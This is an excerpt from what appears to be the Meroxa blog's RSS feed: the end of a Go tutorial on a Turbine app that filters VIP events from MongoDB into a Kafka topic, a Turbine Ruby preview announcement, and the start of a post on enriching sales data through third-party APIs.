  &lt;span class=&quot;token keyword&quot;&gt;if&lt;/span&gt; err &lt;span class=&quot;token operator&quot;&gt;!=&lt;/span&gt; &lt;span class=&quot;token boolean&quot;&gt;nil&lt;/span&gt; &lt;span class=&quot;token punctuation&quot;&gt;{&lt;/span&gt;
  	&lt;span class=&quot;token keyword&quot;&gt;return&lt;/span&gt; err
  &lt;span class=&quot;token punctuation&quot;&gt;}&lt;/span&gt;

  &lt;span class=&quot;token comment&quot;&gt;// apply the &quot;FilterInteresting&quot; processor to those records.&lt;/span&gt;
  res &lt;span class=&quot;token operator&quot;&gt;:=&lt;/span&gt; v&lt;span class=&quot;token punctuation&quot;&gt;.&lt;/span&gt;&lt;span class=&quot;token function&quot;&gt;Process&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;(&lt;/span&gt;rr&lt;span class=&quot;token punctuation&quot;&gt;,&lt;/span&gt; FilterInteresting&lt;span class=&quot;token punctuation&quot;&gt;{&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;}&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;)&lt;/span&gt;

  &lt;span class=&quot;token comment&quot;&gt;// reference the Kafka resource that was created on the platform. In this case I created &quot;cck&quot;.&lt;/span&gt;
  dest&lt;span class=&quot;token punctuation&quot;&gt;,&lt;/span&gt; err &lt;span class=&quot;token operator&quot;&gt;:=&lt;/span&gt; v&lt;span class=&quot;token punctuation&quot;&gt;.&lt;/span&gt;&lt;span class=&quot;token function&quot;&gt;Resources&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;(&lt;/span&gt;&lt;span class=&quot;token string&quot;&gt;&quot;cck&quot;&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;)&lt;/span&gt;
  &lt;span class=&quot;token keyword&quot;&gt;if&lt;/span&gt; err &lt;span class=&quot;token operator&quot;&gt;!=&lt;/span&gt; &lt;span class=&quot;token boolean&quot;&gt;nil&lt;/span&gt; &lt;span class=&quot;token punctuation&quot;&gt;{&lt;/span&gt;
  	&lt;span class=&quot;token keyword&quot;&gt;return&lt;/span&gt; err
  &lt;span class=&quot;token punctuation&quot;&gt;}&lt;/span&gt;

  &lt;span class=&quot;token comment&quot;&gt;// write out the resulting records into the collection (or __Topic__ in the case of Kafka). In this case I&apos;m writing&lt;/span&gt;
  &lt;span class=&quot;token comment&quot;&gt;// out to the Topic &quot;notifications&quot;.&lt;/span&gt;
  err &lt;span class=&quot;token operator&quot;&gt;=&lt;/span&gt; dest&lt;span class=&quot;token punctuation&quot;&gt;.&lt;/span&gt;&lt;span class=&quot;token function&quot;&gt;WriteWithConfig&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;(&lt;/span&gt;res&lt;span class=&quot;token punctuation&quot;&gt;,&lt;/span&gt; &lt;span class=&quot;token string&quot;&gt;&quot;notifications&quot;&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;,&lt;/span&gt; &lt;span class=&quot;token boolean&quot;&gt;nil&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;)&lt;/span&gt;
  &lt;span class=&quot;token keyword&quot;&gt;if&lt;/span&gt; err &lt;span class=&quot;token operator&quot;&gt;!=&lt;/span&gt; &lt;span class=&quot;token boolean&quot;&gt;nil&lt;/span&gt; &lt;span class=&quot;token punctuation&quot;&gt;{&lt;/span&gt;
  	&lt;span class=&quot;token keyword&quot;&gt;return&lt;/span&gt; err
  &lt;span class=&quot;token punctuation&quot;&gt;}&lt;/span&gt;

  &lt;span class=&quot;token keyword&quot;&gt;return&lt;/span&gt; &lt;span class=&quot;token boolean&quot;&gt;nil&lt;/span&gt;
&lt;span class=&quot;token punctuation&quot;&gt;}&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;
&lt;p&gt;Here’s the entirety of the &lt;code class=&quot;language-text&quot;&gt;Run&lt;/code&gt; method. We grab a reference to the MongoDB resource &lt;code class=&quot;language-text&quot;&gt;mdb&lt;/code&gt; we created above, pull records out of the collection &lt;code class=&quot;language-text&quot;&gt;events&lt;/code&gt;, pipe those records through the &lt;code class=&quot;language-text&quot;&gt;FilterInteresting&lt;/code&gt; processor, and ultimately write them out to the topic &lt;code class=&quot;language-text&quot;&gt;notifications&lt;/code&gt; on the Kafka resource &lt;code class=&quot;language-text&quot;&gt;cck&lt;/code&gt; (also created above).&lt;/p&gt;
&lt;h3&gt;Processing Data&lt;/h3&gt;
&lt;p&gt;The actual business logic of our Turbine application is relatively straightforward: we loop through the slice of records, and if a particular event includes &lt;code class=&quot;language-text&quot;&gt;vip: true&lt;/code&gt;, we pass it through to the notifications topic, where a downstream service can notify the appropriate user; everything else is filtered out.&lt;/p&gt;
&lt;div class=&quot;gatsby-highlight&quot; data-language=&quot;go&quot;&gt;&lt;pre class=&quot;language-go&quot;&gt;&lt;code class=&quot;language-go&quot;&gt;&lt;span class=&quot;token comment&quot;&gt;// FilterInteresting looks for &quot;interesting&quot; events and filters out everything else.&lt;/span&gt;
&lt;span class=&quot;token comment&quot;&gt;// For this example, __interesting__ events are any events where an event is associated with a VIP user.&lt;/span&gt;
&lt;span class=&quot;token keyword&quot;&gt;type&lt;/span&gt; FilterInteresting &lt;span class=&quot;token keyword&quot;&gt;struct&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;{&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;}&lt;/span&gt;

&lt;span class=&quot;token keyword&quot;&gt;func&lt;/span&gt; &lt;span class=&quot;token punctuation&quot;&gt;(&lt;/span&gt;f FilterInteresting&lt;span class=&quot;token punctuation&quot;&gt;)&lt;/span&gt; &lt;span class=&quot;token function&quot;&gt;Process&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;(&lt;/span&gt;stream &lt;span class=&quot;token punctuation&quot;&gt;[&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;]&lt;/span&gt;turbine&lt;span class=&quot;token punctuation&quot;&gt;.&lt;/span&gt;Record&lt;span class=&quot;token punctuation&quot;&gt;)&lt;/span&gt; &lt;span class=&quot;token punctuation&quot;&gt;[&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;]&lt;/span&gt;turbine&lt;span class=&quot;token punctuation&quot;&gt;.&lt;/span&gt;Record &lt;span class=&quot;token punctuation&quot;&gt;{&lt;/span&gt;
	&lt;span class=&quot;token keyword&quot;&gt;var&lt;/span&gt; interestingEvents &lt;span class=&quot;token punctuation&quot;&gt;[&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;]&lt;/span&gt;Event
	&lt;span class=&quot;token keyword&quot;&gt;for&lt;/span&gt; &lt;span class=&quot;token boolean&quot;&gt;_&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;,&lt;/span&gt; r &lt;span class=&quot;token operator&quot;&gt;:=&lt;/span&gt; &lt;span class=&quot;token keyword&quot;&gt;range&lt;/span&gt; stream &lt;span class=&quot;token punctuation&quot;&gt;{&lt;/span&gt;
		ev&lt;span class=&quot;token punctuation&quot;&gt;,&lt;/span&gt; err &lt;span class=&quot;token operator&quot;&gt;:=&lt;/span&gt; &lt;span class=&quot;token function&quot;&gt;parseEventRecord&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;(&lt;/span&gt;r&lt;span class=&quot;token punctuation&quot;&gt;)&lt;/span&gt;
		&lt;span class=&quot;token keyword&quot;&gt;if&lt;/span&gt; err &lt;span class=&quot;token operator&quot;&gt;!=&lt;/span&gt; &lt;span class=&quot;token boolean&quot;&gt;nil&lt;/span&gt; &lt;span class=&quot;token punctuation&quot;&gt;{&lt;/span&gt;
			log&lt;span class=&quot;token punctuation&quot;&gt;.&lt;/span&gt;&lt;span class=&quot;token function&quot;&gt;Printf&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;(&lt;/span&gt;&lt;span class=&quot;token string&quot;&gt;&quot;error: %s&quot;&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;,&lt;/span&gt; err&lt;span class=&quot;token punctuation&quot;&gt;.&lt;/span&gt;&lt;span class=&quot;token function&quot;&gt;Error&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;(&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;)&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;)&lt;/span&gt;
			&lt;span class=&quot;token keyword&quot;&gt;continue&lt;/span&gt;
		&lt;span class=&quot;token punctuation&quot;&gt;}&lt;/span&gt;

		&lt;span class=&quot;token keyword&quot;&gt;if&lt;/span&gt; &lt;span class=&quot;token function&quot;&gt;isInteresting&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;(&lt;/span&gt;ev&lt;span class=&quot;token punctuation&quot;&gt;)&lt;/span&gt; &lt;span class=&quot;token punctuation&quot;&gt;{&lt;/span&gt;
			interestingEvents &lt;span class=&quot;token operator&quot;&gt;=&lt;/span&gt; &lt;span class=&quot;token function&quot;&gt;append&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;(&lt;/span&gt;interestingEvents&lt;span class=&quot;token punctuation&quot;&gt;,&lt;/span&gt; ev&lt;span class=&quot;token punctuation&quot;&gt;)&lt;/span&gt;
		&lt;span class=&quot;token punctuation&quot;&gt;}&lt;/span&gt;
	&lt;span class=&quot;token punctuation&quot;&gt;}&lt;/span&gt;

	&lt;span class=&quot;token keyword&quot;&gt;if&lt;/span&gt; &lt;span class=&quot;token function&quot;&gt;len&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;(&lt;/span&gt;interestingEvents&lt;span class=&quot;token punctuation&quot;&gt;)&lt;/span&gt; &lt;span class=&quot;token operator&quot;&gt;&gt;&lt;/span&gt; &lt;span class=&quot;token number&quot;&gt;0&lt;/span&gt; &lt;span class=&quot;token punctuation&quot;&gt;{&lt;/span&gt;
		recs&lt;span class=&quot;token punctuation&quot;&gt;,&lt;/span&gt; err &lt;span class=&quot;token operator&quot;&gt;:=&lt;/span&gt; &lt;span class=&quot;token function&quot;&gt;encodeEvents&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;(&lt;/span&gt;interestingEvents&lt;span class=&quot;token punctuation&quot;&gt;)&lt;/span&gt;
		&lt;span class=&quot;token keyword&quot;&gt;if&lt;/span&gt; err &lt;span class=&quot;token operator&quot;&gt;!=&lt;/span&gt; &lt;span class=&quot;token boolean&quot;&gt;nil&lt;/span&gt; &lt;span class=&quot;token punctuation&quot;&gt;{&lt;/span&gt;
			log&lt;span class=&quot;token punctuation&quot;&gt;.&lt;/span&gt;&lt;span class=&quot;token function&quot;&gt;Printf&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;(&lt;/span&gt;&lt;span class=&quot;token string&quot;&gt;&quot;error: %s&quot;&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;,&lt;/span&gt; err&lt;span class=&quot;token punctuation&quot;&gt;.&lt;/span&gt;&lt;span class=&quot;token function&quot;&gt;Error&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;(&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;)&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;)&lt;/span&gt;
		&lt;span class=&quot;token punctuation&quot;&gt;}&lt;/span&gt;
		&lt;span class=&quot;token keyword&quot;&gt;return&lt;/span&gt; recs
	&lt;span class=&quot;token punctuation&quot;&gt;}&lt;/span&gt;
	&lt;span class=&quot;token keyword&quot;&gt;return&lt;/span&gt; &lt;span class=&quot;token punctuation&quot;&gt;[&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;]&lt;/span&gt;turbine&lt;span class=&quot;token punctuation&quot;&gt;.&lt;/span&gt;Record&lt;span class=&quot;token punctuation&quot;&gt;{&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;}&lt;/span&gt;
&lt;span class=&quot;token punctuation&quot;&gt;}&lt;/span&gt;

&lt;span class=&quot;token comment&quot;&gt;// Event represents the Event document stored in MongoDB.&lt;/span&gt;
&lt;span class=&quot;token keyword&quot;&gt;type&lt;/span&gt; Event &lt;span class=&quot;token keyword&quot;&gt;struct&lt;/span&gt; &lt;span class=&quot;token punctuation&quot;&gt;{&lt;/span&gt;
	UserID    &lt;span class=&quot;token builtin&quot;&gt;string&lt;/span&gt;    &lt;span class=&quot;token string&quot;&gt;`json:&quot;user_id&quot;`&lt;/span&gt;
	Activity  &lt;span class=&quot;token builtin&quot;&gt;string&lt;/span&gt;    &lt;span class=&quot;token string&quot;&gt;`json:&quot;activity&quot;`&lt;/span&gt;
	VIP       &lt;span class=&quot;token builtin&quot;&gt;bool&lt;/span&gt;      &lt;span class=&quot;token string&quot;&gt;`json:&quot;vip&quot;`&lt;/span&gt;
	CreatedAt time&lt;span class=&quot;token punctuation&quot;&gt;.&lt;/span&gt;Time &lt;span class=&quot;token string&quot;&gt;`json:&quot;created_at&quot;`&lt;/span&gt;
	UpdatedAt time&lt;span class=&quot;token punctuation&quot;&gt;.&lt;/span&gt;Time &lt;span class=&quot;token string&quot;&gt;`json:&quot;updated_at&quot;`&lt;/span&gt;
	DeletedAt time&lt;span class=&quot;token punctuation&quot;&gt;.&lt;/span&gt;Time &lt;span class=&quot;token string&quot;&gt;`json:&quot;deleted_at&quot;`&lt;/span&gt;
&lt;span class=&quot;token punctuation&quot;&gt;}&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;
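&lt;p&gt;The &lt;code class=&quot;language-text&quot;&gt;isInteresting&lt;/code&gt; helper is referenced above but its body isn’t shown. Based on the description of this example (any event associated with a VIP user is “interesting”), a minimal, self-contained sketch might look like the following; the one-line predicate and the sample event are assumptions for illustration, not code from the original app:&lt;/p&gt;

```go
package main

import (
	"fmt"
	"time"
)

// Event mirrors the struct from the post.
type Event struct {
	UserID    string    `json:"user_id"`
	Activity  string    `json:"activity"`
	VIP       bool      `json:"vip"`
	CreatedAt time.Time `json:"created_at"`
	UpdatedAt time.Time `json:"updated_at"`
	DeletedAt time.Time `json:"deleted_at"`
}

// isInteresting is a hypothetical predicate: per the post, any event
// tied to a VIP user counts as "interesting".
func isInteresting(ev Event) bool {
	return ev.VIP
}

func main() {
	ev := Event{UserID: "u-42", Activity: "purchase", VIP: true}
	fmt.Println(isInteresting(ev)) // prints: true
}
```

&lt;p&gt;Keeping the predicate separate from the record loop makes it easy to unit test without the Turbine runtime.&lt;/p&gt;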
&lt;h3&gt;Demo&lt;/h3&gt;
&lt;p&gt;Meroxa allows developers to test their code locally via fixtures. Fixtures are a JSON representation of the data that the Turbine library will process. In our &lt;a href=&quot;https://github.com/ahmeroxa/turbine-mongo-kafka-demo/blob/main/fixtures/mdb.json&quot;&gt;example&lt;/a&gt;, we have a single record to represent what the Data Stream Processing App will read from MongoDB and write to Kafka if the &lt;code class=&quot;language-text&quot;&gt;FilterInteresting&lt;/code&gt; function returns an “interesting” event. To run locally, you can run the following command:&lt;/p&gt;
&lt;div class=&quot;gatsby-highlight&quot; data-language=&quot;shell-session&quot;&gt;&lt;pre class=&quot;language-shell-session&quot;&gt;&lt;code class=&quot;language-shell-session&quot;&gt;&lt;span class=&quot;token command&quot;&gt;&lt;span class=&quot;token shell-symbol important&quot;&gt;$&lt;/span&gt; &lt;span class=&quot;token bash language-bash&quot;&gt;meroxa apps run  &lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;
&lt;p&gt;In the output, we can see that 1 record matched the criteria in our code and was written to the &lt;code class=&quot;language-text&quot;&gt;cck&lt;/code&gt; resource. Once you are happy with your code, you can deploy the app live to read and write with your actual resources by running the following commands:&lt;/p&gt;
&lt;div class=&quot;gatsby-highlight&quot; data-language=&quot;shell-session&quot;&gt;&lt;pre class=&quot;language-shell-session&quot;&gt;&lt;code class=&quot;language-shell-session&quot;&gt;&lt;span class=&quot;token command&quot;&gt;&lt;span class=&quot;token shell-symbol important&quot;&gt;$&lt;/span&gt; &lt;span class=&quot;token bash language-bash&quot;&gt;&lt;span class=&quot;token function&quot;&gt;git&lt;/span&gt; &lt;span class=&quot;token function&quot;&gt;add&lt;/span&gt; &lt;span class=&quot;token builtin class-name&quot;&gt;.&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;
&lt;div class=&quot;gatsby-highlight&quot; data-language=&quot;shell-session&quot;&gt;&lt;pre class=&quot;language-shell-session&quot;&gt;&lt;code class=&quot;language-shell-session&quot;&gt;&lt;span class=&quot;token command&quot;&gt;&lt;span class=&quot;token shell-symbol important&quot;&gt;$&lt;/span&gt; &lt;span class=&quot;token bash language-bash&quot;&gt;&lt;span class=&quot;token function&quot;&gt;git&lt;/span&gt; commit &lt;span class=&quot;token parameter variable&quot;&gt;-m&lt;/span&gt; &lt;span class=&quot;token string&quot;&gt;&quot;Initial Commit&quot;&lt;/span&gt;  &lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;
&lt;div class=&quot;gatsby-highlight&quot; data-language=&quot;shell-session&quot;&gt;&lt;pre class=&quot;language-shell-session&quot;&gt;&lt;code class=&quot;language-shell-session&quot;&gt;&lt;span class=&quot;token command&quot;&gt;&lt;span class=&quot;token shell-symbol important&quot;&gt;$&lt;/span&gt; &lt;span class=&quot;token bash language-bash&quot;&gt;meroxa apps deploy  &lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;
&lt;p&gt;💡 For more information on deployment, you can refer to the Meroxa Docs &lt;a href=&quot;https://docs.meroxa.com/turbine/deployment&quot;&gt;here&lt;/a&gt;.&lt;/p&gt;
&lt;p&gt;Once your app is deployed, you will see that every record in your MongoDB has been processed and written to your Kafka topic. As records come into your data source (MongoDB in this example), your Turbine app running on the Meroxa platform will process each record in real time.&lt;/p&gt;
&lt;p&gt;Meroxa sets up all the connections and removes the complexities, so you, the developer, can focus on the important stuff.&lt;/p&gt;
&lt;h3&gt;Next Steps&lt;/h3&gt;
&lt;p&gt;Now that the Turbine Data Stream Processing App has been deployed we can extend the app with additional Destinations. This allows us to also persist the end results into an audit table or data warehouse for additional tracking and analysis.&lt;/p&gt;
&lt;p&gt;To add additional Destinations, you would simply create the resource, reference it (e.g. &lt;code class=&quot;language-text&quot;&gt;v.Resources(&quot;auditdb&quot;)&lt;/code&gt;), and then &lt;code class=&quot;language-text&quot;&gt;write&lt;/code&gt; to it as well.&lt;/p&gt;
&lt;p&gt;💡 You can add additional destinations just like we added MongoDB and Confluent Cloud above, using &lt;code class=&quot;language-text&quot;&gt;meroxa resource create&lt;/code&gt;. See Resources &lt;a href=&quot;https://docs.meroxa.com/platform/resources/overview/&quot;&gt;here&lt;/a&gt;.&lt;/p&gt;
&lt;p&gt;We could also easily extend the processing logic by adding whatever functionality is required to our custom function. This could be as straightforward as reformatting fields, or as sophisticated as importing third-party packages to transform the records or calling external APIs to enrich the data.&lt;/p&gt;
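&lt;p&gt;As a concrete illustration of the field-reformatting case, here is a small, self-contained sketch; &lt;code class=&quot;language-text&quot;&gt;redactUserID&lt;/code&gt; and &lt;code class=&quot;language-text&quot;&gt;normalizeActivity&lt;/code&gt; are hypothetical helpers of the kind you could call from a Turbine processor, not part of the Turbine API:&lt;/p&gt;

```go
package main

import (
	"fmt"
	"strings"
)

// redactUserID keeps the first four characters of an identifier and
// masks the rest, a simple way to avoid leaking raw IDs downstream.
func redactUserID(id string) string {
	if len(id) > 4 {
		return id[:4] + strings.Repeat("*", len(id)-4)
	}
	return "****"
}

// normalizeActivity trims whitespace and lowercases the activity
// name so downstream consumers see a consistent format.
func normalizeActivity(activity string) string {
	return strings.ToLower(strings.TrimSpace(activity))
}

func main() {
	fmt.Println(redactUserID("user-12345"))       // user******
	fmt.Println(normalizeActivity("  Purchase ")) // purchase
}
```

&lt;p&gt;Because these are plain functions, they can be applied inside a processor’s record loop and unit tested in isolation.&lt;/p&gt;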
&lt;p&gt;💡 For an example of using APIs in Turbine, you can read our blog post &lt;a href=&quot;https://meroxa.com/blog/using-turbine-to-call-multiple-apis-in-real-time-to-transform-enrich-your-data&quot;&gt;here&lt;/a&gt;.&lt;/p&gt;
&lt;h2&gt;&lt;strong&gt;Have questions or feedback?&lt;/strong&gt;&lt;/h2&gt;
&lt;p&gt;If you have questions or feedback, reach out directly by joining our &lt;a href=&quot;https://discord.com/invite/pN24QPca6b&quot;&gt;community&lt;/a&gt; or by writing to &lt;a href=&quot;mailto:support@meroxa.com&quot;&gt;support@meroxa.com&lt;/a&gt;.&lt;/p&gt;
&lt;p&gt;Happy Coding 🚀&lt;/p&gt;</content:encoded></item><item><title><![CDATA[Meroxa Now Streaming on Ruby]]></title><description><![CDATA[Combining Ruby’s simplicity and power with Turbine, Rubyists can now build data streaming apps with development workflows you know and love.]]></description><link>https://meroxa.com/blog/meroxa-now-streaming-on-ruby</link><guid isPermaLink="false">https://meroxa.com/blog/meroxa-now-streaming-on-ruby</guid><dc:creator><![CDATA[Jennifer Hudiono]]></dc:creator><pubDate>Thu, 01 Dec 2022 21:12:00 GMT</pubDate><content:encoded>&lt;h2&gt;Preview Turbine Ruby&lt;/h2&gt;
&lt;p&gt;We were thrilled to sponsor and attend &lt;a href=&quot;https://rubyconf.org/&quot;&gt;RubyConf 2022&lt;/a&gt; in Houston this week. Our team had an amazing time connecting with and learning from the Ruby community, which is why we’re excited to introduce Turbine to Rubyists everywhere. The Turbine application framework was designed for software developers to build, test, and deploy data streaming applications using their preferred programming language. As the world continues to move towards real-time, there’s a growing demand for building sophisticated stream processing applications. Where traditionally this would require separate task-specific tooling, new and unfamiliar paradigms, and managing complex services, the Turbine framework streamlines this experience for software developers. Combining Ruby’s simplicity and power with Turbine, Rubyists can now build data streaming apps with development workflows you know and love.&lt;/p&gt;
&lt;p&gt;&lt;img src=&quot;https://lh3.googleusercontent.com/7h-ePFO1bfZO7uHnB1R0K_lec0vZEtODK0NgvXg9kN7PvEYJry7DZaz6peLRxAqft4kIx1YNkYjZRtr51ZeTHnlP_uN2LkDNPznmMEsMwJXMYLjZuyvbNoa9X-pHM4uO6Er_fgZTE3dxbxEe3xB-k8M7bCl5FGPFWMeacN58okQoUhUUDceeUJcmsFJj&quot; alt=&quot;Code snippet&quot;&gt;&lt;/p&gt;
&lt;h2&gt;Tu&lt;strong&gt;RB&lt;/strong&gt;ine Applications&lt;/h2&gt;
&lt;p&gt;The &lt;a href=&quot;https://share.hsforms.com/1s-FMleBKRBWucZB0hkjHAAc2sme&quot;&gt;Turbine Ruby developer preview&lt;/a&gt; will grant you early access to Turbine.rb which is currently in the final stages of feature development. With Turbine.rb developer preview, you can build and deploy a real-time stream processing application using Ruby. The preview will also give you a chance to shape the final stages of feature development with feedback, get pre-release support, and have your application ready prior to launch day.&lt;/p&gt;
&lt;p&gt;Refer to our &lt;a href=&quot;https://docs.meroxa.com/turbine/develop/ruby&quot;&gt;documentation&lt;/a&gt; on how to build and deploy a Turbine app using Ruby.&lt;/p&gt;
&lt;h2&gt;Sign Up for the Developer Preview&lt;/h2&gt;
&lt;p&gt;Turbine Ruby is currently in developer preview with limited functionality. If you wish to participate, sign up &lt;a href=&quot;https://share.hsforms.com/1s-FMleBKRBWucZB0hkjHAAc2sme&quot;&gt;here&lt;/a&gt; and a member of our team will follow up to discuss the steps to get the feature enabled. We love hearing from our users! If you have questions or feedback, please feel free to contact us directly via &lt;a href=&quot;mailto:support@meroxa.com&quot;&gt;support@meroxa.com&lt;/a&gt; or by joining our &lt;a href=&quot;http://discord.meroxa.com/&quot;&gt;Discord community&lt;/a&gt; server.&lt;/p&gt;
&lt;p&gt;🚀 We can’t wait to see what you build!&lt;/p&gt;</content:encoded></item><item><title><![CDATA[Using Turbine to call multiple APIs in real-time to transform & enrich data]]></title><description><![CDATA[Use Meroxa Turbine to call multiple APIs in real-time to transform & enrich your data via Clearbit, Apollo and Hubspot]]></description><link>https://meroxa.com/blog/using-turbine-to-call-multiple-apis-in-real-time-to-transform-enrich-your-data</link><guid isPermaLink="false">https://meroxa.com/blog/using-turbine-to-call-multiple-apis-in-real-time-to-transform-enrich-your-data</guid><dc:creator><![CDATA[Tanveet Gill]]></dc:creator><pubDate>Fri, 18 Nov 2022 14:19:31 GMT</pubDate><content:encoded>&lt;p&gt;Data enrichment and transformations are essential to making the most of your data. Today, we will look at how Meroxa enables developers of any level to enrich and transform their data using a code-first approach. Typically, other real-time transformation vendors limit the type of data manipulation you can do. They typically take a UI approach which limits you to only doing things that the provider has programmed in. With Meroxa’s real-time streaming capabilities and Turbine’s code-first approach, developers have the power to program their data apps any way they want, using languages they are already familiar with.&lt;/p&gt;
&lt;p&gt;Here are a few examples of what you can do with Turbine in real-time:&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;You could use a hashing library like &lt;a href=&quot;https://www.npmjs.com/package/string-hash&quot;&gt;string-hash&lt;/a&gt; to hash sensitive customer data. If you want to encrypt certain data, you could use &lt;a href=&quot;https://www.npmjs.com/package/crypto-js&quot;&gt;crypto-js&lt;/a&gt; to encrypt sensitive fields and store the decryption keys in another data store while keeping the data relational.&lt;/li&gt;
&lt;li&gt;If you have data that needs to be validated, you could write a custom validation function to run on each record. For example, phone number formats in your database could be checked against a validation rule. Furthermore, you could use a third-party API such as &lt;a href=&quot;https://www.twilio.com/docs/lookup/tutorials/validation-and-formatting&quot;&gt;Twilio&lt;/a&gt; or &lt;a href=&quot;https://developers.telnyx.com/docs/api/v1/lrn-data/Extended-LRN-lookup&quot;&gt;Telnyx&lt;/a&gt; to enrich each phone number in your database.&lt;/li&gt;
&lt;li&gt;You can use any API to enrich your data. We’ve seen developers use the Google Maps API to enrich address data to validate and format an address that is easily sharable amongst services.&lt;/li&gt;
&lt;/ul&gt;
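&lt;p&gt;To make the hashing idea concrete, here is a minimal sketch in Go (the language used for the Turbine examples elsewhere on this blog) using the standard library’s SHA-256 rather than the JavaScript libraries mentioned above; &lt;code class=&quot;language-text&quot;&gt;hashPII&lt;/code&gt; is a hypothetical helper name:&lt;/p&gt;

```go
package main

import (
	"crypto/sha256"
	"encoding/hex"
	"fmt"
)

// hashPII produces a stable, one-way, 64-character hex digest of a
// sensitive value so downstream systems can join on it without ever
// seeing the raw data.
func hashPII(value string) string {
	sum := sha256.Sum256([]byte(value))
	return hex.EncodeToString(sum[:])
}

func main() {
	fmt.Println(hashPII("jane.doe@example.com"))
}
```

&lt;p&gt;Note that for production use you would typically use a keyed HMAC rather than a bare hash, so digests can’t be reversed by guessing common values.&lt;/p&gt;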
&lt;h2&gt;Overview&lt;/h2&gt;
&lt;p&gt;In today&apos;s example, we are going to focus on how easy Turbine makes it for developers to call multiple APIs to enrich sales data. This application will take a company name (ex: Apple) from PostgreSQL (really, it can be from any data source) and run each record through a series of API calls. Within Turbine, we will be calling the &lt;a href=&quot;https://clearbit.com/blog/company-name-to-domain-api&quot;&gt;Clearbit API to get the domain name for the company&lt;/a&gt; (ex: Apple → &lt;a href=&quot;http://Apple.com&quot;&gt;Apple.com&lt;/a&gt;), then get contact information on employees at the company using &lt;a href=&quot;https://apolloio.github.io/apollo-api-docs/?shell#search&quot;&gt;Apollo’s Search API&lt;/a&gt; (ex: getting Apple’s CEO, CIO, CFO), and finally, we will &lt;a href=&quot;https://legacydocs.hubspot.com/docs/methods/contacts/create_contact&quot;&gt;create a HubSpot contact&lt;/a&gt; for those employees. Later, we will &lt;a href=&quot;https://legacydocs.hubspot.com/docs/methods/lists/add_contact_to_list&quot;&gt;add those HubSpot contacts to a list&lt;/a&gt; and dump the data into Snowflake for further analysis, and also write it to a Confluent Cloud-managed Kafka cluster for real-time use cases such as personalized outreach. Here is a visual of how this will work:&lt;/p&gt;
&lt;p&gt;&lt;img src=&quot;https://20285798.fs1.hubspotusercontent-na1.net/hubfs/20285798/Flowcharts%20(2).png&quot; alt=&quot;Flowcharts (2)&quot;&gt;&lt;/p&gt;
&lt;h2&gt;The Code&lt;/h2&gt;
&lt;p&gt;We will use the JavaScript &lt;a href=&quot;https://docs.meroxa.com/beta-overview&quot;&gt;Turbine&lt;/a&gt; framework to get records with company names from PostgreSQL, run each record through a series of API calls, and write them to Snowflake and Kafka.&lt;/p&gt;
&lt;p&gt;💡 If you prefer to use another language, Meroxa also supports &lt;a href=&quot;https://docs.meroxa.com/turbine/develop/go/&quot;&gt;Go&lt;/a&gt;, &lt;a href=&quot;https://docs.meroxa.com/turbine/develop/python/&quot;&gt;Python&lt;/a&gt;, and &lt;a href=&quot;https://docs.meroxa.com/turbine/develop/ruby/&quot;&gt;Ruby&lt;/a&gt; with many more languages coming!&lt;/p&gt;
&lt;h3&gt;&lt;strong&gt;Requirements&lt;/strong&gt;&lt;/h3&gt;
&lt;ul&gt;
&lt;li&gt;&lt;a href=&quot;https://auth.meroxa.io/authorize?response_type=code&amp;#x26;client_id=Ty2PyLbdah6pIqRZiq3uxhwA1vhvg6C6&amp;#x26;redirect_uri=https://dashboard.meroxa.io/callback&amp;#x26;mode=signUp&amp;#x26;_ga=2.195716328.574921592.1659337186-1213117309.1659337186&quot;&gt;Meroxa account&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href=&quot;https://docs.meroxa.com/cli/installation-guide&quot;&gt;Meroxa CLI&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href=&quot;https://docs.meroxa.com/platform/resources/postgresql/setup/&quot;&gt;Meroxa supported PostgreSQL DB&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href=&quot;https://quickstarts.snowflake.com/guide/getting_started_with_snowflake/index.html#0&quot;&gt;Snowflake DB (Optional)&lt;/a&gt;&lt;/li&gt;
